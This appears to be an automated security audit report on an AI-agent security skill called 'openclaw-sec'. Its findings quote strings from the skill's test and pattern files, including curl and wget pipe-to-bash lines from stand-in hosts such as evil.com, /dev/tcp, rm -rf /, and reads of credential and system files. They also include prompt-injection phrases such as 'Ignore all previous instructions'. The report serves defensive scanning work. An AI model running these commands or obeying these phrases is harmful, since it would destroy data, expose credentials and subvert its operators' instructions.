ClawAudit verdict
openclaw-sec
Receives external input AND executes processes
Security suite with 6 parallel detection modules for prompt injection, command injection, SSRF, path traversal, secrets exposure, and content policy violations; a legitimate security protection layer with no evidence of malicious behavior.
What it does
These are capability combinations: each listed behavior occurs in the skill, but ClawAudit detects co-occurrence — it does not verify that one flows into another. Read the code to confirm a live chain.
Receives external input AND executes processes — the shape of a command & control channel
LLM05 · LLM06 · ASI10
Executes processes AND makes external network calls — may exfiltrate command output
LLM02 · LLM06 · ASI03
Accesses credentials AND makes external network calls — potential credential theft
LLM02 · ASI03
Accesses credentials AND encodes data — may obfuscate stolen credentials
LLM02 · ASI03 · ASI04
Permission integrity
network_out
credential_access
Findings (38)
Recursive delete from root or home — destructive command
SKILL.md · code · rm -rf /
Accesses sensitive system files
SKILL.md · code · /etc/passwd
Reads /proc/self/environ — dumps all environment variables
SKILL.md · code · /proc/self/environ
Prompt injection — tries to override agent instructions
SKILL.md · code · Ignore all previous instructions
Unicode homoglyph detected — uses lookalike characters to evade pattern matching
src/modules/content-scanner/__tests__/scanner.test.ts · prose
HTTP request to bare IP address — common in malicious payloads
SKILL.md · code · http://169.254.169.254
Possible prompt injection — attempts to redefine agent identity
SKILL.md · code · You are now
subprocess execution — runs system commands from Python
SKILL.md · code · subprocess.run(
Accesses AWS credentials file
__tests__/integration/multi-module.test.ts · prose · downgraded · ~/.aws/credentials
Dynamic __import__('os') — Python OS command execution
src/modules/code-execution-detector/__tests__/detector.test.ts · prose · downgraded · __import__("os")
Direct __builtins__ access — can invoke any builtin function
src/modules/code-execution-detector/__tests__/detector.test.ts · prose · downgraded · __builtins__.
Pipe to bash — executes piped content as shell commands
src/modules/command-validator/__tests__/validator.test.ts · prose · downgraded · | bash
Pipe-to-shell pattern (curl | sh) — supply chain attack vector
src/modules/command-validator/__tests__/validator.test.ts · prose · downgraded · curl http://evil.com/script.sh | bash
Pipe-to-shell pattern (wget | sh)
src/modules/command-validator/__tests__/validator.test.ts · prose · downgraded · wget http://malicious.com/script.sh -O - | bash
Bash /dev/tcp — raw TCP connection via shell
src/modules/command-validator/__tests__/validator.test.ts · prose · downgraded · /dev/tcp/
Uses eval() — can execute arbitrary code
src/modules/content-scanner/__tests__/scanner.test.ts · prose · downgraded · eval(
Possible hardcoded credential
src/modules/secret-detector/__tests__/detector.test.ts · prose · downgraded · api_key = "abcdefghijklmnopqrstuvwxyz
Dynamic Function constructor — equivalent to eval()
src/patterns/runtime-validation/code-execution-patterns.ts · prose · downgraded · new Function(
Pipe to sh — executes piped content as shell commands
src/patterns/runtime-validation/command-injection.ts · prose · downgraded · |sh
Popular HTTP library — network access
SKILL.md · code · Got
References webhook/callback URL
SKILL.md · code · webhook_url
Accesses .ssh directory
__tests__/integration/multi-module.test.ts · prose · downgraded · .ssh/
Accesses cloud provider credentials
__tests__/integration/multi-module.test.ts · prose · downgraded · ~/.aws
Long base64 string (100+ chars) — likely obfuscated payload
__tests__/integration/multi-module.test.ts · prose · downgraded · 48656c6c6f20576f726c6421205468697320697320612074657374206d65737361676520746f2074
Uses exec() — may execute shell commands
__tests__/integration/multi-module.test.ts · prose · downgraded · exec(
Dynamic import() — loads module at runtime
jest.config.js · prose · downgraded · import("
References child_process — can spawn system processes
src/__tests__/cli.test.ts · prose · downgraded · child_process
Reads files from sensitive system paths
src/modules/code-execution-detector/__tests__/detector.test.ts · prose · downgraded · readFileSync("/etc
os.system/popen — direct OS command execution
src/modules/code-execution-detector/__tests__/detector.test.ts · prose · downgraded · os.system(
subprocess with shell=True — command injection vector
src/modules/command-validator/__tests__/validator.test.ts · prose · downgraded · subprocess.Popen("whoami", shell=True
Base64 decode (atob) — may hide malicious payloads
src/modules/content-scanner/__tests__/scanner.test.ts · prose · downgraded · atob(
References SSH/GPG private keys
src/modules/path-validator/__tests__/validator.test.ts · prose · downgraded · ssh_key
References sudo — requests elevated privileges
src/patterns/prompt-injection/policy-puppetry.ts · prose · downgraded · sudo
Base64 encoding/decoding
src/modules/content-scanner/__tests__/scanner.test.ts · prose · downgraded · base64_encode
String.fromCharCode — can build strings to evade detection
src/modules/content-scanner/__tests__/scanner.test.ts · prose · downgraded · String.fromCharCode
Base64 encode (btoa) — may obfuscate data exfiltration
src/modules/content-scanner/__tests__/scanner.test.ts · prose · downgraded · btoa(
References tunneling service
src/modules/exfiltration-detector/__tests__/detector.test.ts · prose · downgraded · ngrok
Sets world-executable permissions
src/patterns/runtime-validation/command-injection.ts · prose · downgraded · chmod 777
Why the tier is capped
Execution sink present in raw bytes (Hard Floor: class A/B/D/E). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.
Permissions & capabilities
No declared permissions — minimal attack surface.
credential_accessnetwork_innetwork_outdata_encodingprocess_exec Thanks — recorded.